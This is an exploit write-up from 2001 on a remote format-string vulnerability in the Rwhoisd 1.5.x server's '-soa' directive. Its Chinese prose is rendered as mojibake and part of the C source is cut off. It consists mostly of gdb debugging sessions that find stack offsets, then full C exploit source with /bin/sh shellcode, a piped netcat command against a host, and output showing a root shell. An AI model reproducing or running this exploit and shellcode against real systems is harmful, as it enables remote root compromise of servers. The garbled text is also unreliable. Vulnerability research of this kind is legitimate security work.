RWhoisd 1.5.xÔ¶³Ì¸ñÊ½»¯×Ö·û´®Â©¶´Ç³Îö by alert7 2001-11-20 Rwhoisd ÊÇÒ»¸öUnixÏµÍ³ÏÂµÄRWHOIS·þÎñÆ÷³ÌÐò¡£ËüÓÉNetwork Solutions¹«Ë¾¿ª·¢ºÍÎ¬»¤¡£ Rwhoisd´æÔÚÒ»¸öÔ¶³Ì¸ñÊ½´®Â©¶´£¬¹¥»÷Õß¿ÉÄÜÔ¶³ÌÖ´ÐÐÈÎÒâ´úÂë¡£ Èç¹û¹¥»÷ÕßÊ¹ÓÃÒ»¸ö°üº¬¸ñÊ½´®µÄ¶ñÒâ×Ö·û´®×÷Îª²ÎÊýÌá¹©¸ø'-soa'Ö¸Áî£¬Õâ¸ö×Ö·û´®½« ±»×÷Îª¸ñÊ½´®´«µÝ¸øprint_error()º¯Êý£¬Õâ¿ÉÄÜµ¼ÖÂ¹¥»÷ÕßÈÎÒâÐÞ¸ÄÈÎÒâÄÚ´æµÄÄÚÈÝ£¬ ¹¥»÷Õß¿ÉÄÜÔ¶³ÌÒÔrwhoisdµÄÔËÐÐÉí·ÝÖ´ÐÐÈÎÒâ´úÂë¡£ ²»Ö»'-soa'Ö¸ÁîÊÜÓ°Ïì£¬Ðí¶àÓÃµ½print_error()º¯ÊýµÄÖ¸Áî»áÊÜµ½Ó°Ïì¡£ ÀýÈç£º -rwhois %p %error 300 Not Compatible With Version: 0xbffff8c8 ÑÝÊ¾µ÷ÊÔ [root@redhat62 server]# gdb rwhoisd -q (gdb) attach 17746 Attaching to program: /root/rwhoisd-1.5.7/server/rwhoisd, Pid 17746 Reading symbols from /lib/libresolv.so.2...done. Reading symbols from /lib/libnsl.so.1...done. Reading symbols from /lib/libcrypt.so.1...done. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. Reading symbols from /lib/libnss_files.so.2...done. Reading symbols from /lib/libnss_nisplus.so.2...done. Reading symbols from /lib/libnss_nis.so.2...done. 0x40110ad4 in __libc_read () from /lib/libc.so.6 (gdb) b print_error Breakpoint 1 at 0x805d9c1: file client_msgs.c, line 120. (gdb) c Continuing. Breakpoint 1, print_error (__builtin_va_alist=2) at client_msgs.c:120 120 if (printed_error_flag) (gdb) disass print_error Dump of assembler code for function print_error: 0x805d9bc : push %ebp 0x805d9bd : mov %esp,%ebp 0x805d9bf : push %esi 0x805d9c0 : push %ebx 0x805d9c1 : cmpl $0x0,0x80767f4 0x805d9c8 : jne 0x805da3a 0x805d9ca : lea 0xc(%ebp),%ebx 0x805d9cd : mov 0xfffffffc(%ebx),%ecx 0x805d9d0 : xor %eax,%eax 0x805d9d2 : mov $0x8076664,%esi 0x805d9d7 : lea 0x0(,%eax,8),%edx 0x805d9de : cmp %ecx,(%edx,%esi,1) 0x805d9e1 : jne 0x805d9f8 0x805d9e3 : pushl 0x8076668(%edx) 0x805d9e9 : push $0x8070cd9 0x805d9ee : call 0x8049c6c 0x805d9f3 : add $0x8,%esp 0x805d9f6 : jmp 0x805d9fe 0x805d9f8 : inc %eax 0x805d9f9 : cmp $0x22,%eax 0x805d9fc : jbe 0x805d9d7 0x805d9fe : add $0x4,%ebx 0x805da01 : mov 0xfffffffc(%ebx),%esi 0x805da04 : cmpb $0x0,(%esi) 0x805da07 : je 0x805da16 0x805da09 : push $0x8070ce4 0x805da0e : call 0x8049c6c 0x805da13 : add $0x4,%esp 0x805da16 : push %ebx 0x805da17 : push %esi 0x805da18 : pushl 0x8076ddc 0x805da1e : call 0x8049b2c 0x805da23 : add $0xc,%esp 0x805da26 : push $0x8070ce7 0x805da2b : call 0x8049c6c 0x805da30 : movl $0x1,0x80767f4 0x805da3a : lea 0xfffffff8(%ebp),%esp 0x805da3d : pop %ebx 0x805da3e : pop %esi 0x805da3f : leave 0x805da40 : ret End of assembler dump. (gdb) i reg $esp $ebp $eip $eax $ebx $esi esp 0xbffff7c0 -1073743936 ebp 0xbffff7c8 -1073743928 eip 0x805d9c1 134601153 eax 0x808de68 134798952 ebx 0x0 0 esi 0x808de78 134798968 (gdb) b * 0x805da1e Breakpoint 2 at 0x805da1e: file /usr/include/bits/stdio.h, line 35. (gdb) c Continuing. Breakpoint 2, 0x805da1e in print_error (__builtin_va_alist=2) at /usr/include/bits/stdio.h:35 35 return vfprintf (stdout, __fmt, __arg); (gdb) i reg $esp $ebp $eip $eax $ebx $esi esp 0xbffff7b4 -1073743948 ebp 0xbffff7c8 -1073743928 eip 0x805da1e 134601246 eax 0x2 2 ebx 0xbffff7d8 -1073743912 esi 0x808de58 134798936 (gdb) bt #0 0x805da1e in print_error (__builtin_va_alist=16) at /usr/include/bits/stdio.h:35 #1 0x804f87d in soa_parse_args (str=0xbffff8b5 "aaaa%p%p") at soa.c:53 #2 0x804fa7e in soa_directive (str=0xbffff8b5 "aaaa%p%p") at soa.c:182 #3 0x804a943 in run_directive (query_str=0xbffff8b0 "-soa") at directive.c:167 #4 0x804f362 in processline (str=0xbffff8b0 "-soa") at session.c:74 #5 0x804f7ae in run_session (real_flag=1) at session.c:294 #6 0x804a689 in run_daemon () at daemon.c:324 #7 0x804b928 in main (argc=3, argv=0xbffffb54) at main.c:238 (gdb) disass vfprintf Dump of assembler code for function _IO_vfprintf: 0x400af920 <_IO_vfprintf>: push %ebp 0x400af921 <_IO_vfprintf+1>: mov %esp,%ebp 0x400af923 <_IO_vfprintf+3>: sub $0x688,%esp 0x400af929 <_IO_vfprintf+9>: push %edi 0x400af92a <_IO_vfprintf+10>: push %esi 0x400af92b <_IO_vfprintf+11>: push %ebx 0x400af92c <_IO_vfprintf+12>: call 0x400af931 <_IO_vfprintf+17> 0x400af931 <_IO_vfprintf+17>: pop %ebx .... (gdb) b *0x400af923 Breakpoint 3 at 0x400af923: file vfprintf.c, line 209. (gdb) c Continuing. Breakpoint 3, 0x400af923 in _IO_vfprintf (s=0x40158980, format=0x808de58 "aaaa%p%p", ap=0xbffff7d8) at vfprintf.c:209 209 vfprintf.c: No such file or directory. (gdb) bt #0 0x400af923 in _IO_vfprintf (s=0x40158980, format=0x808de58 "aaaa%p%p", ap=0xbffff7d8) at vfprintf.c:209 #1 0x805da23 in print_error (__builtin_va_alist=16) at /usr/include/bits/stdio.h:35 #2 0x804f87d in soa_parse_args (str=0xbffff8b5 "aaaa%p%p") at soa.c:53 #3 0x804fa7e in soa_directive (str=0xbffff8b5 "aaaa%p%p") at soa.c:182 #4 0x804a943 in run_directive (query_str=0xbffff8b0 "-soa") at directive.c:167 #5 0x804f362 in processline (str=0xbffff8b0 "-soa") at session.c:74 #6 0x804f7ae in run_session (real_flag=1) at session.c:294 #7 0x804a689 in run_daemon () at daemon.c:324 #8 0x804b928 in main (argc=3, argv=0xbffffb54) at main.c:238 (gdb) i f 0 Stack frame at 0xbffff7ac: eip = 0x400af923 in _IO_vfprintf (vfprintf.c:209); saved eip 0x805da23 called by frame at 0xbffff7c8 source language c. Arglist at 0xbffff7ac, args: s=0x40158980, format=0x808de58 "aaaa%p%p", ap=0xbffff7d8 Locals at 0xbffff7ac, Previous frame's sp is 0x0 Saved registers: ebx at 0xbffff118, ebp at 0xbffff7ac, esi at 0xbffff11c, edi at 0xbffff120, eip at 0xbffff7b0 (gdb) i reg $esp $ebp $eip $eax $ebx $esi esp 0xbffff7ac -1073743956 ebp 0xbffff7ac -1073743956 eip 0x400af923 1074460963 eax 0x2 2 ebx 0xbffff7d8 -1073743912 esi 0x808de58 134798936 (gdb) x/20x 0xbffff7ac 0xbffff7ac: 0xbffff7c8 0x0805da23 0x40158980 0x0808de58 0xbffff7bc: 0xbffff7d8 0x00000000 0x0808de78 0xbffff7e8 0xbffff7cc: 0x0804f87d 0x00000010 0x0808de58 0xbffff8b5 0xbffff7dc: 0x08082dd8 0x00000001 0x0808de68 0xbffff7f8 0xbffff7ec: 0x0804fa7e 0xbffff8b5 0xbffff8b5 0xbffff810 (gdb) x/20x 0xbffff7d8 0xbffff7d8: 0xbffff8b5 0x08082dd8 0x00000001 0x0808de68 0xbffff7e8: 0xbffff7f8 0x0804fa7e 0xbffff8b5 0xbffff8b5 0xbffff7f8: 0xbffff810 0x0804a943 0xbffff8b5 0x00000000 0xbffff808: 0x00000004 0xbffffae4 0xbffff8a0 0x0804f362 0xbffff818: 0xbffff8b0 0xbffff8b0 0x00000004 0xbffffae4 ÎÒÃÇÒª¸²¸ÇµÄvfprintfº¯Êý±¾Éí·µ»ØµØÖ·´æ·ÅµÄµØÖ·Îª0xbffff7b0 format stringÎ»ÖÃÎª0xbffff8b5,format string¶ÔÓ¦µÄ²ÎÊýµØÖ·¿ªÊ¼Îª0xbffff7d8£» 0xbffff8b5+3-0xbffff7d8=224 bytes ËùÒÔÓÐ224¸öÀ¬»ø£¬ÆäÖÐ3¸öÊÇÎªÁË¶ÔÆë¶øÌí¼ÓµÄ¡£ -soa aaaa%p%p %error 340 Invalid Authority Area: aaaa0xbffff8b50x8082dd8 -soa aaaa%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %error 340 Invalid Authority Area: aaaa0xbffff8b50x8082dd80x10x808bd400xbffff7f80x804fa7e0xbffff8b50xbffff8b50xbffff8100x804a9430xbffff8b5(nil)0x30xbffffae40xbffff8a00x804f3620xbffff8b00xbffff8b00x30xbffffae4(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)0x100000000xbffffab00xbffff8a40x804a6ec0xe0xbffffab00x804f7ae0xbffff8b00x40x616f732d0x61616100 ÑÝÊ¾exploit [alert7@redhat62 alert7]$ cat e.c /* *by alert7 for Rwhoisd exploit demo *(./e;cat )|nc 192.168.168.50 4321 *2001-11-20 */ #include #include #define FORMATSTRING_ADDR 0xbffff8b5 //format stringµØÖ· #define FORMATSTRING_ARGV 0xbffff7d8 //format string¶ÔÓ¦µÄ²ÎÊýµÄ¿ªÊ¼µØÖ· #define DEFAULT_RETLOC 0xbffff7b0 //º¯Êý±¾Éí·µ»ØµØÖ·´æ·ÅµÄµØÖ· //#define DEFAULT_RETLOC 0x807693c+4//.dtors +4 char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xdb\x31\xc9\x43\x41\x41\xb0\x3f\xcd\x80" "\xeb\x25\x5e\x89\xf3\x83\xc3\xe0\x89\x73\x28\x31\xc0\x88\x43\x27\x89\x43" "\x2c\x83\xe8\xf5\x8d\x4b\x28\x8d\x53\x2c\x89\xf3\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xd6\xff\xff\xff/bin/sh" ; int main(int argc, char *argv[]) { char *ptr; long shell_addr,retloc=DEFAULT_RETLOC; int i,SH1,SH2; int DEFAULT_ALIGNMENT;//¶ÔÆë int paging; char buf[1024]; DEFAULT_ALIGNMENT=4-(FORMATSTRING_ADDR-FORMATSTRING_ARGV)%4; if (DEFAULT_ALIGNMENT==4) DEFAULT_ALIGNMENT=0; paging=FORMATSTRING_ADDR+DEFAULT_ALIGNMENT-FORMATSTRING_ARGV; //printf("Using RET location address: 0x%x\n", retloc); shell_addr = FORMATSTRING_ADDR+DEFAULT_ALIGNMENT+8*2+(paging/4)*2+20; //printf("Using Shellcode address: 0x%x\n", shell_addr); SH1 = (shell_addr >> 16) & 0xffff;//SH1=0xbfff SH2 = (shell_addr >> 0) & 0xffff;//SH2=0xd3a8 ptr = buf; for (i=0;i> 8 ) & 0xff ; (*ptr++) = ((retloc+2) >> 16 ) & 0xff ; (*ptr++) = ((retloc+2) >> 24 ) & 0xff ; memset(ptr,'B',4); ptr += 4 ; (*ptr++) = (retloc) & 0xff; (*ptr++) = ((retloc) >> 8 ) & 0xff ; (*ptr++) = ((retloc) >> 16 ) & 0xff ; (*ptr++) = ((retloc) >> 24 ) & 0xff ; for (i=0;i<(224/4);i++) { (*ptr++) = '%'; (*ptr++) = 'c'; } sprintf(ptr,"%%%uc%%hn%%%uc%%hn",(SH1-8*2-(paging/4)-DEFAULT_ALIGNMENT),(SH2-SH1 )); /*ÍÆ¼ö¹¹Ôì¸ñÊ½»¯´®µÄÊ±ºòÊ¹ÓÃ%hn*/ } if ((SH1 )>(SH2)) { memset(ptr,'B',4); ptr += 4 ; (*ptr++) = (retloc) & 0xff; (*ptr++) = ((retloc) >> 8 ) & 0xff ; (*ptr++) = ((retloc) >> 16 ) & 0xff ; (*ptr++) = ((retloc) >> 24 ) & 0xff ; memset(ptr,'B',4); ptr += 4 ; (*ptr++) = (retloc+2) & 0xff; (*ptr++) = ((retloc+2) >> 8 ) & 0xff ; (*ptr++) = ((retloc+2) >> 16 ) & 0xff ; (*ptr++) = ((retloc+2) >> 24 ) & 0xff ; for (i=0;i<(224/4);i++) { (*ptr++) = '%'; (*ptr++) = 'c'; } sprintf(ptr,"%%%uc%%hn%%%uc%%hn",(SH2-8*2-(paging/4)-DEFAULT_ALIGNMENT),(SH1-SH2 )); } if ((SH1 )==(SH2)) { printf("²»»áÕâÃ´ÇÉ°É£¬½ñÌì¿ÉÒÔÈ¥Âò²ÊÆ±ÁË:)\n"); exit(0); } printf("-soa %s%s\n",buf,shellcode); } [alert7@redhat62 alert7]$ gcc -o e e.c [alert7@redhat62 alert7]$ (./e;cat )|nc 192.168.168.50 4321 ..... B1À1Û1ÉCAA°?Íë%^óÃàs(1ÀC'C,èõK(S,óÍ1ÛØ@ÍèÖÿÿÿ/bin/sh /bin/sh: PuTTY: command not found id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) ÒÔÉÏÕ¹Ê¾ÁËÒ»Ð©µ÷ÊÔ¼¼ÊõºÍÐ´format string expliotµÄ¼¼Êõ£¬»òÐí¶ÔÄúÓÐÐ©°ïÖú¡£